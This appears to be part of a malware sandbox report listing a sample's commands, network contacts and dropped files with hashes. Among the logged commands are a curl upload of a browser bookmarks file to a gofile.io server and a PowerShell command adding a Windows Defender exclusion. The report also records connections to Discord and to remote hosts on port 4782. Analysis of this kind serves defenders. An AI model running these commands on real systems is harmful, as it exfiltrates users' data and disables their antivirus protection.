curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store9.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MyFolder\me.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionProcess 'C:\WINDOWS\system32\WindowsSecureManager\RuntimeBroker.exe'"

C:\Program Files (x86)\MyFolder\unins000.exe

"C:\Program Files (x86)\MyFolder\unins000.exe"

C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp

"C:\Users\Admin\AppData\Local\Temp\iu-14D2N.tmp\_unins.tmp" /SECONDPHASE="C:\Program Files (x86)\MyFolder\unins000.exe" /FIRSTPHASEWND=$7026E

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
FI 85.23.24.170:4782 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
FI 85.23.109.34:4782 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
US 8.8.8.8:53 store9.gofile.io udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 253.102.89.159.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 239.190.168.206.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 177.101.63.23.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 206.168.190.239:443 store9.gofile.io tcp
US 206.168.190.239:443 store9.gofile.io tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
US 162.159.135.232:443 discord.com tcp
FI 82.128.254.93:4782 tcp

Files

memory/1016-0-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1016-2-0x0000000000401000-0x00000000004B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-RL12C.tmp\Update.tmp

MD5 6a4ac87c4331dc724e6fea16e0ab4b7e
SHA1 3dcab7b5fc73352c01eb24e827626670fa323cec
SHA256 3b9ccf0ba93ecc3640ec5637d3bcfa030c260e6a6222ac7a4bebdd0a91af9a66
SHA512 dc8e3c8a90cd7751f069c5e00c40abbd66a407eeea783829c82242ff9d52fa9389220aed896705dd81911a9d007d3a394cb24c7c3c1e08020bbc2d3c371a9eb6

memory/944-6-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Program Files (x86)\MyFolder\me.bat

MD5 0829830a1636e2958b07fc827cb5d3d7
SHA1 6051bfbf49df5f44c41f20104a079a8d0f7acb94
SHA256 b2fce48164d3196f4ec0d85766cb37a9dd12e5a2b478a10583d38c2561616f6b
SHA512 ac40f48729c6b14e3d43c55f46a12584de8e48b74473f8011071d4869fbdfac30aa27f91e73d99584b88c88e02d7a03901a168c3403566fb40c1d3198cf91755

memory/2152-22-0x00000000735DE000-0x00000000735DF000-memory.dmp

memory/2152-23-0x00000000052D0000-0x0000000005306000-memory.dmp

memory/2152-25-0x0000000005940000-0x0000000005F68000-memory.dmp

memory/2152-24-0x00000000735D0000-0x0000000073D80000-memory.dmp

memory/2152-26-0x00000000735D0000-0x0000000073D80000-memory.dmp

memory/2152-27-0x00000000058C0000-0x00000000058E2000-memory.dmp

memory/2152-28-0x0000000006120000-0x0000000006186000-memory.dmp

memory/2152-29-0x0000000006240000-0x00000000062A6000-memory.dmp

memory/2152-32-0x00000000062B0000-0x0000000006604000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvie4kdl.oo4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2152-40-0x0000000006880000-0x000000000689E000-memory.dmp

memory/2152-41-0x0000000006910000-0x000000000695C000-memory.dmp

memory/2152-42-0x0000000006E40000-0x0000000006E72000-memory.dmp

memory/2152-53-0x00000000735D0000-0x0000000073D80000-memory.dmp

memory/2152-43-0x000000006FA80000-0x000000006FACC000-memory.dmp

memory/2152-54-0x0000000006E20000-0x0000000006E3E000-memory.dmp

memory/2152-55-0x00000000735D0000-0x0000000073D80000-memory.dmp

memory/2152-56-0x0000000007A80000-0x0000000007B23000-memory.dmp

memory/2152-57-0x00000000081F0000-0x000000000886A000-memory.dmp

memory/2152-58-0x0000000007BB0000-0x0000000007BCA000-memory.dmp

memory/2152-59-0x0000000007C20000-0x0000000007C2A000-memory.dmp

memory/2152-60-0x0000000007E30000-0x0000000007EC6000-memory.dmp

memory/2152-61-0x0000000007DB0000-0x0000000007DC1000-memory.dmp

memory/2152-62-0x0000000007DE0000-0x0000000007DEE000-memory.dmp

memory/2152-63-0x0000000007DF0000-0x0000000007E04000-memory.dmp

memory/2152-64-0x0000000007EF0000-0x0000000007F0A000-memory.dmp

memory/2152-65-0x0000000007ED0000-0x0000000007ED8000-memory.dmp

memory/2152-68-0x00000000735D0000-0x0000000073D80000-memory.dmp

memory/1016-69-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/944-70-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Program Files (x86)\MyFolder\RunMe.exe

MD5 392a6ea0718747e4ad443f730047715b
SHA1 808d682efeb32bd7f98e49b7b99350683162059e
SHA256 36be936ba0fc160a314bfaf9be4c8689730ad9c11c3cf6fb7d066c43a934b257
SHA512 b033da7b04a2dc9a342de4970ae1fe26cda4d82bd3fe4a2a2f34507675832912cc6d66456a8a846f75a705523514d4b52bbd120e7b629c3d38467d999d2e95b4

memory/4248-80-0x0000000000410000-0x0000000000734000-memory.dmp

memory/944-84-0x0000000000400000-0x000000000071C000-memory.dmp

memory/1016-86-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4612-92-0x000000001D350000-0x000000001D3A0000-memory.dmp

memory/4612-93-0x000000001D460000-0x000000001D512000-memory.dmp

memory/4612-94-0x000000001DB50000-0x000000001E078000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RunMe.exe.log

MD5 baf55b95da4a601229647f25dad12878
SHA1 abc16954ebfd213733c4493fc1910164d825cac8
SHA256 ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924
SHA512 24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

C:\Program Files (x86)\MyFolder\creal.exe

MD5 f30d80c5cc481bc1551ba698ed69d24e
SHA1 86129322de12089f037b67b6f69920fb66d79eaa
SHA256 f22f3850560e197d1a8d241b4e41f41c410c19c695d58a62597d2eca5a6c8d4d
SHA512 3502704bd74d305efafd28ff4c1ad55c02eb4ed873206018cd79a9b8e848caf5b978ca8f8b8bb4d00f0618449f85ad8d4ea23a44022d68a3e4f3bcfe8eeb4d7c

C:\Users\Admin\AppData\Local\Temp\_MEI28442\ucrtbase.dll

MD5 b0397bb83c9d579224e464eebf40a090
SHA1 81efdfe57225dfe581aafb930347535f08f2f4ce
SHA256 d2ebd8719455ae4634d00fd0d0eb0c3ad75054fee4ff545346a1524e5d7e3a66
SHA512 e72a4378ed93cfb3da60d69af8103a0dcb9a69a86ee42f004db29771b00a606fbc9cbc37f3daa155d1d5fe85f82c87ca9898a39c7274462fcf5c4420f0581ab3

C:\Users\Admin\AppData\Local\Temp\_MEI28442\python310.dll

MD5 deaf0c0cc3369363b800d2e8e756a402
SHA1 3085778735dd8badad4e39df688139f4eed5f954
SHA256 156cf2b64dd0f4d9bdb346b654a11300d6e9e15a65ef69089923dafc1c71e33d
SHA512 5cac1d92af7ee18425b5ee8e7cd4e941a9ddffb4bc1c12bb8aeabeed09acec1ff0309abc41a2e0c8db101fee40724f8bfb27a78898128f8746c8fe01c1631989

C:\Users\Admin\AppData\Local\Temp\_MEI28442\VCRUNTIME140.dll

MD5 870fea4e961e2fbd00110d3783e529be
SHA1 a948e65c6f73d7da4ffde4e8533c098a00cc7311
SHA256 76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644
SHA512 0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

C:\Users\Admin\AppData\Local\Temp\_MEI28442\python3.dll

MD5 c17b7a4b853827f538576f4c3521c653
SHA1 6115047d02fbbad4ff32afb4ebd439f5d529485a
SHA256 d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68
SHA512 8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

C:\Users\Admin\AppData\Local\Temp\_MEI28442\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI28442\_ctypes.pyd

MD5 ca4cef051737b0e4e56b7d597238df94
SHA1 583df3f7ecade0252fdff608eb969439956f5c4a
SHA256 e60a2b100c4fa50b0b144cf825fe3cde21a8b7b60b92bfc326cb39573ce96b2b
SHA512 17103d6b5fa84156055e60f9e5756ffc31584cdb6274c686a136291c58ba0be00238d501f8acc1f1ca7e1a1fadcb0c7fefddcb98cedb9dd04325314f7e905df3

C:\Users\Admin\AppData\Local\Temp\_MEI28442\base_library.zip

MD5 834e53f3fd722d0daec7c98e98c270ae
SHA1 e908273bbc3e85660ca21598ac0a38391e0c31b1
SHA256 69cd5244e6519d8bae5e79be3d4d62ba1769ae769ea2335d2980547949072273
SHA512 cf782a32ac31a9ba74022670f62da8661a4bfaaba845f26bd9f7388ff6e5d34e94428931561bb4952f9b9cfed020adeb086f70cb0acee44b45847b2f7ec81b3d

C:\Users\Admin\AppData\Local\Temp\_MEI28442\_bz2.pyd

MD5 bbe89cf70b64f38c67b7bf23c0ea8a48
SHA1 44577016e9c7b463a79b966b67c3ecc868957470
SHA256 775fbc6e9a4c7e9710205157350f3d6141b5a9e8f44cb07b3eac38f2789c8723
SHA512 3ee72ba60541116bbca1a62db64074276d40ad8ed7d0ca199a9c51d65c3f0762a8ef6d0e1e9ebf04bf4efe1347f120e4bc3d502dd288339b4df646a59aad0ec1

C:\Users\Admin\AppData\Local\Temp\_MEI28442\_lzma.pyd

MD5 0a94c9f3d7728cf96326db3ab3646d40
SHA1 8081df1dca4a8520604e134672c4be79eb202d14
SHA256 0a70e8546fa6038029f2a3764e721ceebea415818e5f0df6b90d6a40788c3b31
SHA512 6f047f3bdaead121018623f52a35f7e8b38c58d3a9cb672e8056a5274d02395188975de08cabae948e2cc2c1ca01c74ca7bc1b82e2c23d652e952f3745491087

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-debug-l1-1-0.dll

MD5 a998282826d6091984d7d5f0bf476a31
SHA1 b958281ad7b861e0adcbeb0033932057082ae4fc
SHA256 263e038363527b7bed05110f37f7e5b95f82aab9c0280c9c522cf7bfce10fd7d
SHA512 ba46b6e7649cded62e9c097c29d42a8ea3da52109d285b8ed7aaea9a93c203efcfd856d25cee9bd825c0835b37a1d7a37a8ae55e0e10dc237f0da7013056cf5d

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-multibyte-l1-1-0.dll

MD5 2e75ba5bc87963d4244ae9bac3457466
SHA1 a624f1eb6ae3b7ee01fee889e65e0d7a4253ffa8
SHA256 77328a716589be3c3bcf1f3d3134b4ad050380f504dbc1a3fa076380d77ed0f8
SHA512 c3ab9bd515a52aa19767f0cbe5efdc4a8d145bda959ae13eb3e587c1c20d05c9b3563dc2665699b597d34da0593f8a324d197c1407abaad8118d0d599f5279fc

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-math-l1-1-0.dll

MD5 0936c89e36a8bac313de187e50c61078
SHA1 7f0e64a66301e1926fa9acdc36ad728958ce6d78
SHA256 5ba8f9c2842990ccdb447fc6d22023103b03f5387f341d3375809f060b5bb4ef
SHA512 a72fcadc55d12c97770f1222bb3b605b7d58157f6f55814d900fe0f1b5ff8075f84914c7ac66d4b0e59ef41c01504a35c391bfb182e2e9019d152037ef4ec20f

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-locale-l1-1-0.dll

MD5 fb992bbb73e0127c70d075f81e52aaf9
SHA1 e9d326d436e2e55c521261ad9a5b73d2e998f644
SHA256 6011ece89f4833dcb4cefb02ea366b828725205eae6f25ab704b76fd9e5d86eb
SHA512 f568898a660c3850998b71a854fb5b8ffee59f02ebe7bc8c12ad9bc68f5472a0c812cf0a8ebc096fcc462e941a86a2a46619d4f03030e7ab69a0e4a9e7b1e0b6

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-heap-l1-1-0.dll

MD5 bacc491eb1dee4786ade841e7b480cd8
SHA1 84cb8f770cdf873415403edf48e625514aecad02
SHA256 43c80120970be1efed3ea60bf7aa37b46fcce946b94fb11ca6e3ffff2f16bb29
SHA512 7832912f38cd6ba145af57548c2a1d4da3bed9392a0ab3a0faffe18fab40087e1d74676e2af004627a37f7e079b9146dccf7aaa04e360a88443196fede4ccadc

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 bbbf361746440219a3f7933ced5234bb
SHA1 1e3ededaa28e41f51e903c2ca66e7bd048fbaee7
SHA256 42a99227775e85ca8c197811a86aad0e2af496bd21623e4c9a2dd747571c8990
SHA512 f6681875bc02903676cd3ea3303920202c563a1a6e82dd687ed9bd0fafe92c9abba4a6df3e9c93f2bb0da9dccf0abb4543b6a5e5f0c92fa06e809b30b84085aa

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-environment-l1-1-0.dll

MD5 71407c52ff12b113cc0498fdd42db8dc
SHA1 f0c6a3c1308177b090b2a94fee90156e1df6bb9b
SHA256 5a2ae5b270c1eaf467878e7f5dbdc689b71914bdf30293d7d46c01d9dd11bdd4
SHA512 b9bb29d76a144c10b234835b6006637c84103abeb8f5db19991f3ab2baaabe3ea3fc1a87132263d097addd01afcad08e77c9834dccd4c6723b3ca204f50aac1e

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-convert-l1-1-0.dll

MD5 cf95a8f66313283f046ba9e6e5cdbba4
SHA1 b25c686fcc6729a88a8776cdb75ff21cbceb1c5d
SHA256 2ccb01b62188ddc051a582c128bf880608111c602534e487ec09a7cf67c22d17
SHA512 59f5901e513aceeeb819c73c5b9fe2504e80af28df54db19775d7c0e0481f14c21ce38e6db207672cc10facfdd217638829af2d3f0f85a0a413d10e3a81dae9c

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-crt-conio-l1-1-0.dll

MD5 a5daf7d2dd7d447196f5aa65c3b48755
SHA1 847c75d74be334298a8cdb414905cad66bbf0b49
SHA256 1368b9af85f186a2b35e2a744eb2103555234b32fdfbfdb94c0f5e525c588e46
SHA512 32b1463dee8cbc4ccb5296b22281e014f432887eec07773e41477ecebbd1fb85087ff6adc6b7ac68d5fee818f3289daceb2817881bdbe2838cc104d2166a9607

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-util-l1-1-0.dll

MD5 7fcf9a2588c1372d6104333a4cfc4603
SHA1 8c1ea131a30178c4f250d0cef254557fded0d132
SHA256 2e1cc12f93837a4e1fe95e0c640b147be29793705628f9c6cd91a0b5c0c50262
SHA512 2fb84dcedfeddbf41109dbadb59ede86ceeb168db08955dbf9395fab7a18941cc7313bcb47cb31cfd2978540e9beed346044e6c5b5defa61f59b9b78535e784b

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-timezone-l1-1-0.dll

MD5 ea5f768b9a1664884ae4ae62cec90678
SHA1 ae08e80431da7f4e8f1e5457c255cc360ef1cac0
SHA256 24f4530debf2161e0d0256f923b836aeccc3278a6ff2c9400e415600276b5a6d
SHA512 411db31e994ebbc69971972e45d6e51186d8f8790e8c67660b6a846e48a5a5c53a113916a5a15d14c33d8c88037d7f252135e699cb526c4bb3b5abd2e2dfee7c

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 6971c41c21eb35668520f0bb949b3742
SHA1 5de3a45c15afb7c2038dc7fc0d29275b7fb90a36
SHA256 3513cffa44c88ec13d6a8c9b63e5d505a131b46746d13ee654144f08a96f20c3
SHA512 dd9914f547d5c34efd0f2879ebffd2d3ec9daf7465dffb7644ae0f4bc05f9f75df8b49ca8d692a8de7a92854a1b44c81e6f1b15ee691bf1995a1da76d3c3b82a

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-synch-l1-2-0.dll

MD5 da5d400ade0d2288b17dcc11ed339e25
SHA1 f4a340079477a2c91e091968fe2d252cb01eeae2
SHA256 69dd52caffe1ea6e0900fb9604a57a87618f8468dc68cbb2a9bcefd1265f3f49
SHA512 3bfa3b4f93a0a68e1c0ac17c74c91c0a01b779961af4811756223fd1f47a86ce1f3ebd7ee4190a2edb84a50b1b444318965cad3a74d1ed4acfa014d0f5bbe34a

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-synch-l1-1-0.dll

MD5 6dbc816b9aef0f91b57bfc9a3ab18972
SHA1 e88cb7a5955630d29d24d2f05f540403ed9498e3
SHA256 a981a24c9231e0230031bb1cba8f2509565ece1f53ebdb4d0a50efd722ab4330
SHA512 bfb4cfc89eb8b1409a826e59699f2c3f4af765f114281bb30026dad02d2353ca95ec3b544f522833e657be4cf69b1070dc9bd3767b7a6014c2cbacba38c023e3

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-string-l1-1-0.dll

MD5 82fa7c54d034123805b57c96a5bced7f
SHA1 bbc6ebffbf21996f187345b7e28b9dfeca31829e
SHA256 9b071b842445a5dd90148445af148d024674085927d079864f7893807fd1b305
SHA512 715b2e794b2c2af5cdec22653d569ed33cf91bc092fae49449111cf7450385d1e5a1c713feac231bcedfa12fab7af57005c53f7721330400aef7c17dabddafff

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 d6fc6c9da69334221c5438f5c7444336
SHA1 ac385fee49c6a4f7ff918fa93ef3324e71943505
SHA256 bcb9a6dd2cc0caaa700d95fa3af5163a8246388c2efefbbc4cf6e1fe2687c72e
SHA512 646d23590974acf8ea523018b97d994df4d760500c5bbddc9d6bcbb5c0fc5665b82b40b49b7636050b83269aea4fa802b3be016a02403fe189cbe72fc1de0ed5

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-profile-l1-1-0.dll

MD5 7b746cda44a5773455c455690ba26a4f
SHA1 d6ff8a5ac6c71e0b037236fad32f9bbecfc68aec
SHA256 cc3c609193f2e99f80a6a21064d10c5c591101e386338879326775ccdd77dcb6
SHA512 25fd04facb3ddabbcb0265cd7a306d6c159ac6419a3e2ff4de7bb9fe41eb9a1e3afecea6558771b9e4b3f912227dda65021822fbe1ab52d7dcf6cd115bea84f3

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-processthreads-l1-1-1.dll

MD5 d399c926466f044f183faa723ba59120
SHA1 a9534b4910888d70eefba6fcc3376f2549cb4a05
SHA256 19b018be16afe143fb107ef1dd5b8e6c6cb45966806eb3d31ec09ff0dc2b70d1
SHA512 fc55f4cfe7c6c63e0720971d920c5c6ead4db74a671f7bb8dc830aa87cb54459a62e974456875bdfda449d82a0acb368e3b6c2cc20c32b1b407e8de7cc532057

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-processthreads-l1-1-0.dll

MD5 42e99c89e241f21bf2fb20f3ff477eba
SHA1 e3b0012cd6d74f0ac2bf0c34997a87333c895834
SHA256 6e5bd110a2f4dc345b68e9a8fb081783586c8c25f46027c58443ade2d3e1bf01
SHA512 8eed3b21695cccae0dbf2db844efa11ad4957cd7bcd6c8ab7cfd4f0653bbacfd6bedd82ac27c3995f6418ae38ed0b8d46afa0bdfc627c16619aab775c5f8da16

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 88916eed5164cb8884ebba842cd540cc
SHA1 f15674fbfef5b09cc02c924336554c17b715db00
SHA256 9c1afc7cd0b0e0d136d09b65dd082ace136fc306f8f116f3d13956211ec146c8
SHA512 2929c3ab67b364a7caf6c8fe1a42309917a0620f36c5d7194ca8a41ab7703a564ded32a4f9291a4f8fdd7d3a35383715fd8bef10ff603554b95519d109469617

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 f08cd348ac935ac60436ac4cb1836203
SHA1 fd0608e704677fd4733296c2577647057541f392
SHA256 e8382a73730c2f7f873b40e2fcc5e1cd4847e7cb42fef3c76bea183af5891d65
SHA512 595e08301a0cbfd4f943ea3555dbce27d37b16c340b6972b054097b889285bbf942cc0314797a714a2e393956075c5dd95a5d2c2d4bde143b5f5387793e7a8de

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-memory-l1-1-0.dll

MD5 e56f2d05d147add31d6f89bcd1f008ca
SHA1 dde258c7b42b17363bca53b5554a5e13ea056f80
SHA256 8a4b66cea7b474506fbdbe4c45e78923645f5f0a13f7f4e43449649f50ea38b8
SHA512 9fd1afd32fda24a92af4bb24661f7cf791cc6686b65f13dae97c56a1e83b25f0f2710c77167e6a9a491001877a0712c9a011833bb6026e08ae536744f0b40905

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-localization-l1-2-0.dll

MD5 9d8e7a90dd0d54b7ccde435b977ee46d
SHA1 15cd12089c63f4147648856b16193cf014e6764f
SHA256 dc570708327c4c8419d4cced2a162d7ca112a168301134dd1fb5e2040eee45b6
SHA512 339fe195602355bce26a2526613a212271e7f8c7518d591b9e3c795c154d93b29b8c524b2c3678c799d0ea0101eabea918564e49def0b915af0619e975f1c34b

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 7b828554daa24f54275b81dfa54e0c62
SHA1 03fa109c21c0dc2e847117de133a68c6cd891555
SHA256 929298566ba01d1c3e64356a1f8370c1e97f0599f56f823c508cde9ae17f130b
SHA512 1f4f030d4a1cd3f98ba628dee873978b3797a4a7db66615fc484270a2b3fa68f231d9d12142840cfb52d7592c1ae7af6e35ae7a410878774a9fb199d7a647985

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-interlocked-l1-1-0.dll

MD5 5f2e21c4f0be6a9e15c8ddc2ecdd7089
SHA1 1282b65a9b7276679366fe88c55fab442c0cc3a1
SHA256 ea60d03a35ef2c50306dbbd1ad408c714b1548035c615359af5a7ce8c0bd14a8
SHA512 a32c5ed72d4bfda60b2259e5982e42a79040225a4877246f3a645e05bfb8be395555fa22b2f0ed884f5fd82a8021bba85637727544c9adbb3a8c97b80e7a30f2

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-heap-l1-1-0.dll

MD5 f2c267153db0182cca23038fc1cbf16a
SHA1 10d701ab952cacbf802615b0b458bc4d1a629042
SHA256 dd1e8c77002685629c5cd569ee17f9aa2bcb2e59d41b76ae5bc751cae26d75bf
SHA512 84f3c587be5a91752eeffd4f8e5ded74877930515fd9f4d48021b0f22a32feb3a4ddb9a0f14748e817f8c648bd307942ec026fc67eea922247499b5f412b4914

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-handle-l1-1-0.dll

MD5 f90e3b45c7942e3e30ecf1505253b289
SHA1 83beec2358de70268bc2e26ed0a1290aaef93f94
SHA256 7e45a1b997331f4d038f847f205904d6ec703df7a8c5c660435697e318ced8fc
SHA512 676450eb70a5ceae1820a978412ef3df746f14790322122b2de3e18ef013802c27867ad315950fc9b711e66f36628b062e57a7ec44d1ddc06f443655383cdc14

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-file-l2-1-0.dll

MD5 4c9bf992ae40c7460a029b1046a7fb5e
SHA1 79e13947af1d603c964cce3b225306cadff4058b
SHA256 18655793b4d489f769327e3c8710aced6b763c7873b6a8dc5ae6f28d228647f4
SHA512 c36d455ac79a73758f6090977c204764a88e929e8eaa7ce27a9c9920451c014e84ae98beb447e8345a8fa186b8c668b076c0ed27047a0e23ad2eeaf2cbc3a8d8

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-file-l1-2-0.dll

MD5 b59d773b0848785a76baba82d3f775fa
SHA1 1b8dcd7f0e2ab0ba9ba302aa4e9c4bfa8da74a82
SHA256 0dc1f695befddb8ee52a308801410f2f1d115fc70668131075c2dbcfa0b6f9a0
SHA512 cbd52ed8a7471187d74367aa03bf097d9eac3e0d6dc64baf835744a09da0b050537ea6092dcb8b1e0365427e7f27315be2145c6f853ef936755ad07ef17d4a26

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-file-l1-1-0.dll

MD5 e933cdd91fd5725873f57532f262f815
SHA1 e48f6f301a03beb5e57a0727a09e7c28a68e19f3
SHA256 120c3afed9ce2a981c61208757fca0665f43926751ec8d0d13e10ef1096a0d48
SHA512 d1c598f964a98a30c6a4926f6b19f8213884224861c36aba839f5a91acefaa8c0e8b3d7cd555103885520432a343b489044e4ad3a1c33d77cf3fda4493eb48fb

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-fibers-l1-1-0.dll

MD5 ee3f0d24e7e32e661ac407c60b84b7db
SHA1 09107fb9ace59a1ac3a8b8dbb4ff00b91182929b
SHA256 c86ebc9f48e2db659e80d9c7ad5f29e6b6c850eea58813c041baeff496ae4f18
SHA512 c3fbba7fad4fe03a3a763ad86681655f1bb04d6dd9f64c0083aaa0262ce18f82970365532337825d44ec92b3d79b3212817b25f188537a3771807ad17e7f8d05

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 c148a26d3d9d39777dabe28dc08cee60
SHA1 4f7537ba8cee5ff774f8d7c3fe4174fc512b70d4
SHA256 085968d938ea924827c4740697713674850218a8fe91dd9982e93b0effacc820
SHA512 6689dfb19898f420632295fb9982668919011784278dc6840716c91ca8dcb434057096640a15fab7a93edf722530451da274d02bb344cd429388412ad11a79e0

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-datetime-l1-1-0.dll

MD5 b71c18f8966cead654800ff402c6520f
SHA1 a6f658ea85ad754cf571f7b67f3360d5417f94bd
SHA256 a94b80a5111aabefb1309609abdd300bb626d861cd8e0938b9735ab711a43c22
SHA512 17867aaa57542c1cd989ca3000f3d93bbb959eb5a69100c70c694bde10db8f8422d3e86e1a5fc0848677e4343c424013cdf496b8bb685f8875c3330271242369

C:\Users\Admin\AppData\Local\Temp\_MEI28442\api-ms-win-core-console-l1-1-0.dll

MD5 39852d24acf76cf0b3a427f46663efdf
SHA1 92b9730c276c6f2a46e583fc815374c823e6098b
SHA256 191e08dea0ad5ac02e7e84669d9fffa5aa67dc696e36077c5fa20d81c80b6a56
SHA512 e6f0898871b769244818d93117fe3cb82cc8f12bb24d6b3406ffcaa2a26f0b5754246b5c739e9cbcf07cb94aabba2fd934e7054607b4086b2f4c5592607e8385

